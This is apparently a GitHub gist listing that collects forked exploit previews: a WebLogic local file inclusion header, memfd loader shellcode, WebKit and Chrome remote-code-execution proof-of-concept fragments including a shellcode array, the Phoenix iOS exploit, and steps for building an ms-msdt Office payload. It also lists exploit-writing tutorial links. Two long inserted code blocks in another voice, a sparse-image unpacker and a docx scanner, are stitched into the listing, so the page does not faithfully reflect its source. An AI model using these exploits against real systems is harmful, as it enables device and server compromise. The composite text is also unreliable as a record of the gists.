@CrackerCat
CrackerCat / fast_simg2img.py
Created April 7, 2024 08:38 — forked from snake-4/fast_simg2img.py
Fast Android Sparse Image unpacker
#!/usr/bin/env python3
import sys
import struct
SPARSE_HEADER_SIZE = 28
SPARSE_HEADER_MAGIC = 0xED26FF3A
SPARSE_HEADER_MAJOR_VER = 1
SPARSE_CHUNK_SIZE = 12
SPARSE_CHUNK_TYPE_RAW = 0xCAC1
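The preview above only shows the constants. The following is an added example (my code, not the gist's) of a complete packer and unpacker for the format those constants describe, using the field layout from AOSP's libsparse/sparse_format.h: a 28-byte file header, then chunks that are RAW (0xCAC1), FILL (0xCAC2), DONT_CARE (0xCAC3) or CRC32 (0xCAC4). The unpacker validates every size field before using it, so a crafted image cannot make it read past the input or allocate an unbounded output buffer; the `max_out` limit and the constructed sample image in the usage note are my assumptions.

```python
#!/usr/bin/env python3
"""Pack and unpack Android sparse images (added example, not the gist's code).

Layout per AOSP libsparse/sparse_format.h, all fields little endian:
  file header (28 bytes): magic u32, major u16, minor u16, file_hdr_sz u16,
    chunk_hdr_sz u16, blk_sz u32, total_blks u32, total_chunks u32, image_checksum u32
  chunk header (12 bytes): chunk_type u16, reserved u16, chunk_sz u32 (in blocks),
    total_sz u32 (bytes, chunk header included)
"""
import io
import struct
import sys

SPARSE_HEADER_MAGIC = 0xED26FF3A
SPARSE_HEADER_MAJOR_VER = 1
SPARSE_HEADER_SIZE = 28
SPARSE_CHUNK_SIZE = 12
CHUNK_RAW, CHUNK_FILL, CHUNK_DONT_CARE, CHUNK_CRC32 = 0xCAC1, 0xCAC2, 0xCAC3, 0xCAC4

FILE_HDR = struct.Struct("<IHHHHIIII")   # 28 bytes
CHUNK_HDR = struct.Struct("<HHII")       # 12 bytes
assert FILE_HDR.size == SPARSE_HEADER_SIZE and CHUNK_HDR.size == SPARSE_CHUNK_SIZE


def pack_sparse(raw: bytes, blk_sz: int = 4096) -> bytes:
    """Build a sparse image: all-zero blocks become DONT_CARE, blocks made of one
    repeated 32-bit word become FILL, everything else is emitted RAW."""
    if blk_sz % 4 or len(raw) % blk_sz:
        raise ValueError("raw image must be a whole number of 4-byte-aligned blocks")
    runs = []  # [chunk_type, fill_word, block_count, raw_payload]
    for off in range(0, len(raw), blk_sz):
        blk = raw[off:off + blk_sz]
        if blk.count(0) == blk_sz:
            ctype, word = CHUNK_DONT_CARE, b""
        elif blk == blk[:4] * (blk_sz // 4):
            ctype, word = CHUNK_FILL, blk[:4]
        else:
            ctype, word = CHUNK_RAW, b""
        if runs and runs[-1][0] == ctype and runs[-1][1] == word:
            runs[-1][2] += 1                       # extend the current run
            runs[-1][3] += blk if ctype == CHUNK_RAW else b""
        else:
            runs.append([ctype, word, 1, bytearray(blk) if ctype == CHUNK_RAW else bytearray()])
    out = bytearray(FILE_HDR.pack(SPARSE_HEADER_MAGIC, SPARSE_HEADER_MAJOR_VER, 0,
                                  SPARSE_HEADER_SIZE, SPARSE_CHUNK_SIZE, blk_sz,
                                  len(raw) // blk_sz, len(runs), 0))
    for ctype, word, nblk, payload in runs:
        body = bytes(payload) if ctype == CHUNK_RAW else word   # FILL carries its 4-byte word
        out += CHUNK_HDR.pack(ctype, 0, nblk, SPARSE_CHUNK_SIZE + len(body)) + body
    return bytes(out)


def unpack_sparse(sparse: bytes, max_out: int = 1 << 30) -> bytes:
    """Expand a sparse image to raw bytes. Every header field is checked before
    use so a crafted image cannot read past the input or exceed max_out bytes."""
    if len(sparse) < SPARSE_HEADER_SIZE:
        raise ValueError("truncated file header")
    magic, major, _minor, fhdr_sz, chdr_sz, blk_sz, total_blks, total_chunks, _crc = \
        FILE_HDR.unpack_from(sparse, 0)
    if magic != SPARSE_HEADER_MAGIC or major != SPARSE_HEADER_MAJOR_VER:
        raise ValueError("not a version 1 sparse image")
    if fhdr_sz != SPARSE_HEADER_SIZE or chdr_sz != SPARSE_CHUNK_SIZE:
        raise ValueError("unexpected header sizes")
    if blk_sz == 0 or blk_sz % 4:
        raise ValueError("block size must be a non-zero multiple of 4")
    expected = total_blks * blk_sz
    if expected > max_out:
        raise ValueError(f"declared image size {expected} exceeds limit {max_out}")
    out = io.BytesIO()
    off = fhdr_sz
    for _ in range(total_chunks):
        if off + chdr_sz > len(sparse):
            raise ValueError("truncated chunk header")
        ctype, _res, nblk, total_sz = CHUNK_HDR.unpack_from(sparse, off)
        if total_sz < chdr_sz or off + total_sz > len(sparse):
            raise ValueError("chunk total_sz overruns the file")
        body = sparse[off + chdr_sz:off + total_sz]
        nbytes = nblk * blk_sz
        if out.tell() + nbytes > expected:
            raise ValueError("chunks exceed the declared total_blks")
        if ctype == CHUNK_RAW:
            if len(body) != nbytes:
                raise ValueError("RAW chunk body does not match chunk_sz * blk_sz")
            out.write(body)
        elif ctype == CHUNK_FILL:
            if len(body) != 4:
                raise ValueError("FILL chunk needs a 4-byte fill word")
            out.write(body * (nbytes // 4))
        elif ctype == CHUNK_DONT_CARE:
            if body:
                raise ValueError("DONT_CARE chunk must have no body")
            out.write(bytes(nbytes))
        elif ctype == CHUNK_CRC32:
            if len(body) != 4 or nblk != 0:
                raise ValueError("malformed CRC32 chunk")
        else:
            raise ValueError(f"unknown chunk type {ctype:#06x}")
        off += total_sz
    if out.tell() != expected:
        raise ValueError("chunks do not cover the declared total_blks")
    return out.getvalue()


if __name__ == "__main__":
    # usage: sparse_example.py <sparse.img> <raw.img>   (raise max_out for real system images)
    with open(sys.argv[1], "rb") as f:
        raw_image = unpack_sparse(f.read(), max_out=1 << 34)
    with open(sys.argv[2], "wb") as f:
        f.write(raw_image)
```

A constructed raw image of one zero block, one block of the repeated word `ABCD`, one arbitrary block and two trailing zero blocks packs to four chunks (DONT_CARE, FILL, RAW, DONT_CARE) and unpacks back to the same bytes; a header that declares 0xFFFFFFFF blocks is rejected before any output is allocated.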
http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
@CrackerCat
CrackerCat / outline_graph.py
Created September 2, 2022 00:32 — forked from NyaMisty/outline_graph.py
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@CrackerCat
CrackerCat / ms-msdt.MD
Created May 31, 2022 00:51 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE object references pointing at HTML files. There is a URL scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
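The two ingredients described above, an OLE object relationship whose target is external rather than an embedded part, and a target using the ms-msdt: scheme, are both visible in the relationship parts inside the docx zip. The following is an added example (my code, not tothi's) of a scanner that walks every `*.rels` part, flags `oleObject` relationships with `TargetMode="External"`, and flags any relationship target that starts with `ms-msdt:`. The minimal docx it builds for itself is constructed and contains only a document part and its relationships; the target URLs in the usage note are placeholders.

```python
#!/usr/bin/env python3
"""Flag docx files whose OLE objects reference external targets or whose
relationships use the ms-msdt: scheme (added example, not the gist's code)."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MAX_PART = 1 << 20   # refuse to parse absurdly large .rels parts (zip-bomb guard)


def scan_docx(data: bytes) -> list:
    """Return one dict per suspicious relationship found in any *.rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_PART:
                continue
            # ElementTree on untrusted XML: for production use defusedxml or an
            # equivalent entity-expansion guard in front of this call.
            root = ET.fromstring(z.read(info.filename))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if rel.get("Type") == OLE_REL_TYPE and external:
                    findings.append({"part": info.filename, "id": rel.get("Id"),
                                     "target": target, "reason": "external OLE object"})
                if re.match(r"\s*ms-msdt:", target, re.I):
                    findings.append({"part": info.filename, "id": rel.get("Id"),
                                     "target": target, "reason": "ms-msdt: scheme"})
    return findings


def make_sample_docx(ole_target: str, external: bool) -> bytes:
    """Constructed minimal docx (document part + its relationships) for testing."""
    mode = ' TargetMode="External"' if external else ""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="{ole_target}"{mode}/>'
            '</Relationships>')
    doc = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           '<w:body><w:p><w:r><w:t>sample</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", doc)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # usage: scan_docx_rels.py file1.docx [file2.docx ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            for hit in scan_docx(f.read()):
                print(f"{path}: {hit['part']} {hit['id']} {hit['reason']}: {hit['target']}")
```

An embedded OLE object (`Target="embeddings/oleObject1.bin"`, no `TargetMode`) produces no finding; an external OLE target such as the placeholder `http://example.invalid/payload.html` produces one; an external target using the `ms-msdt:` scheme produces two, one per rule, so a triage queue can prioritise the scheme hit over a plain external reference.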
@CrackerCat
CrackerCat / CVE-2022-21371
Created January 26, 2022 02:06 — forked from picar0jsu/CVE-2022-21371
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371
# Description
@CrackerCat
CrackerCat / mem-loader.asm
Created October 30, 2021 10:56 — forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, brandonkmiller@protonmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license. See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to an ELF
@CrackerCat
CrackerCat / fuck.js
Created May 24, 2021 04:57 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@CrackerCat
CrackerCat / gist:faec709c2cbf37a3af63902fb41eb3a8
Created April 26, 2021 04:17 — forked from wdormann/CVE-2021-21224.html
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
@CrackerCat
CrackerCat / phoenix.c
Created April 23, 2021 04:53 — forked from Siguza/phoenix.c
Phœnix exploit / iOS 9.3.5
// Bugs by NSO Group / Ian Beer.
// Exploit by Siguza & tihmstar.
// Thanks also to Max Bazaliy.
#include <stdint.h> // uint32_t, uint64_t
#include <stdio.h> // fprintf, stderr
#include <string.h> // memcpy, memset, strncmp
#include <unistd.h> // getpid
#include <mach/mach.h>
#include <stdlib.h>